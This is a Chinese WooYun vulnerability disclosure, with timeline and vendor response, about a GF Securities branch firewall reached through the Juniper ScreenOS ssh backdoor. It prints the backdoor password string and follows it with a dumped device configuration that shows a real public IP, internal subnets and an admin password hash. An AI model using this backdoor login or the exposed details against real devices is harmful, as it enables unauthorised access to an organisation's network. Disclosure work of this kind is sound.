乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-23: 细节已通知厂商并且等待厂商处理中 2015-12-23: 厂商已经确认,细节仅向厂商公开 2016-01-02: 细节向核心白帽子及相关领域专家公开 2016-01-12: 细节向普通白帽子公开 2016-01-22: 细节向实习白帽子公开 2016-02-06: 细节向公众公开
防火墙,都懂得~
测试的时候发现这个
juniper的后门大家都懂的~
泄露了内网配置的信息
从这里可以看到设置的网址
进入后发现是广发证券的系统
ssh [email protected] <<< %s(un='%s') = %u
get system get route get config
Total Config size 7343:unset key protection enableset clock timezone 0set vrouter trust-vr sharableset vrouter "untrust-vr"exitset vrouter "trust-vr"unset auto-route-exportexitset alg appleichat enableunset alg appleichat re-assembly enableset alg sctp enableset auth-server "Local" id 0set auth-server "Local" server-name "Local"set auth default auth server "Local"set auth radius accounting port 1646set admin name "netscreen"set admin password "nBe1I4riNixKcyMK4szKMpDt8YAJjn"set admin port 8088set admin telnet port 2323set admin auth web timeout 10set admin auth dial-in timeout 3set admin auth server "Local"set admin format dosset zone "Trust" vrouter "trust-vr"set zone "Untrust" vrouter "trust-vr"set zone "DMZ" vrouter "trust-vr"set zone "VLAN" vrouter "trust-vr"set zone id 100 "OA-LAN"set zone "Untrust-Tun" vrouter "trust-vr"set zone "Trust" tcp-rstset zone "Untrust" blockunset zone "Untrust" tcp-rstset zone "MGT" blockunset zone "V1-Trust" tcp-rstunset zone "V1-Untrust" tcp-rstset zone "DMZ" tcp-rstunset zone "V1-DMZ" tcp-rstunset zone "VLAN" tcp-rstunset zone "OA-LAN" tcp-rstset zone "Untrust" screen tear-dropset zone "Untrust" screen syn-floodset zone "Untrust" screen ping-deathset zone "Untrust" screen ip-filter-srcset zone "Untrust" screen landset zone "V1-Untrust" screen tear-dropset zone "V1-Untrust" screen syn-floodset zone "V1-Untrust" screen ping-deathset zone "V1-Untrust" screen ip-filter-srcset zone "V1-Untrust" screen landset interface "ethernet0/0" zone "Untrust"set interface "ethernet0/1" zone "DMZ"set interface "ethernet0/3" zone "OA-LAN"set interface "bgroup0" zone "Trust"set interface "tunnel.1" zone "Untrust"set interface "tunnel.2" zone "Untrust"set interface bgroup0 port ethernet0/2unset interface vlan1 ipset interface ethernet0/0 ip 183.63.155.248/27set interface ethernet0/0 routeset interface ethernet0/3 ip 192.168.60.95/24set interface ethernet0/3 routeset interface bgroup0 ip 192.168.1.1/24set interface bgroup0 natset interface tunnel.1 ip unnumbered interface ethernet0/0set interface tunnel.2 ip unnumbered interface ethernet0/0unset interface vlan1 bypass-others-ipsecunset interface vlan1 bypass-non-ipset interface ethernet0/0 ip manageableset interface ethernet0/3 ip manageableset interface bgroup0 ip manageableset interface ethernet0/0 manage pingset interface ethernet0/0 manage sshset interface ethernet0/0 manage telnetset interface ethernet0/0 manage webset interface ethernet0/3 manage pingset interface ethernet0/3 manage sshset interface ethernet0/3 manage telnetset interface ethernet0/3 manage webset interface bgroup0 dhcp server serviceset interface bgroup0 dhcp server autoset interface bgroup0 dhcp server option gateway 192.168.1.1set interface bgroup0 dhcp server option netmask 255.255.255.0set interface bgroup0 dhcp server ip 192.168.1.33 to 192.168.1.126unset interface bgroup0 dhcp server config next-server-ipset interface "serial0/0" modem settings "USR" init "AT&F"set interface "serial0/0" modem settings "USR" activeset interface "serial0/0" modem speed 115200set interface "serial0/0" modem retry 3set interface "serial0/0" modem interval 10set interface "serial0/0" modem idle-time 10
应该已经出补丁了吧,打补丁~~
危害等级:高
漏洞Rank:10
确认时间:2015-12-23 17:21
感谢洞主。漏洞存在,属于我司分支机构设备,我们已处理。
暂无